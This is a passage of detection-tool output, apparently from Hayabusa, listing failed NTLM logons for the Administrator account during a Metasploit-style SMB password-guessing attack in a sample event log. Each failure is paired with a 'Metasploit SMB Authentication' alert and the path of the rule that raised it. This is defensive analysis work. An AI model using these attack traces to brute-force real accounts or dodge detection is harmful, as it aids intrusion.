Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 